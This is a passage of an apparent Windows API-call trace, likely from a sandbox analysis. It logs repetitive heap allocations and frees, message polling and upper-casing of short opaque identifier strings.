[0086.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0086.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0086.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0086.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0086.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0086.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0086.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0086.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0086.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0086.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0086.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0086.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0086.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0086.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0086.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0086.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0086.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0086.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0086.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0086.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0086.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0086.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0086.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0086.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7698 | out: hHeap=0x2af0000) returned 1 [0086.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0086.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0086.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0086.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0086.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0086.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0086.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0086.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0086.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0086.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0086.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0086.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0086.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0086.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0086.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0086.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0086.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0086.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0086.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0086.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0086.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0086.852] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0086.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0086.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0086.852] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0086.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0086.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0086.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa96e8 [0086.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0086.852] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0086.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0086.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0086.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0086.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0086.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0086.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0086.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0086.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0086.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0086.852] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0086.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0086.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0086.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0086.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0086.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0086.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0086.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0086.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0086.853] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0086.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0086.853] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0086.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0086.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0086.853] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0086.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0086.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0086.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa97c0 [0086.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0086.853] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0086.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0086.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0086.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0086.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0086.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0086.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0086.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0086.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0086.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0086.853] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0086.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0086.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0086.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0086.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0086.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0086.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0086.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0086.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0086.853] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0086.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0086.854] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0086.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0086.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0086.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0086.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0086.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0086.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0086.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0086.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0086.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0086.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0086.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0086.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0086.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7000 [0086.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0086.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0086.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0086.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0086.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0086.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0086.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0086.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0086.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7000 | out: hHeap=0x2af0000) returned 1 [0086.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0086.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0086.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0086.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9808 [0086.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0086.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9820 [0086.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9670 [0086.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9700 [0086.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0086.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0086.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9850 [0086.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0086.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9b50 [0086.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9940 [0086.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9bb0 [0086.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a743e8 [0086.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0086.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9be0 [0086.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9ac0 [0086.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9b38 [0086.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0086.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa99a0 [0086.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a78 [0086.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0086.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0086.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0086.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0086.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0086.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0086.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0086.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0086.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0086.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0086.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0086.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0086.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0086.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0086.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0086.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0086.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0086.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0086.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0086.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0086.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0086.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0086.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0086.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0086.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0086.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0086.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0086.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0086.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0086.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0086.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0086.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0086.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0086.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0086.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0086.857] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0086.857] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0086.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0086.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0086.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0086.857] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0086.857] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0086.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0086.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0086.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0086.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0086.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0086.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0086.857] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0086.857] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0086.857] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0086.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0086.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0086.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0086.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0086.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0086.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0086.858] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0086.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0086.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0086.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0086.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0086.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0086.858] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0086.858] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0086.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0086.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0086.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0086.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0086.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0086.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0086.858] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0086.858] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0086.858] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0086.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0086.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0086.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0086.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0086.858] RtlAllocateHeap 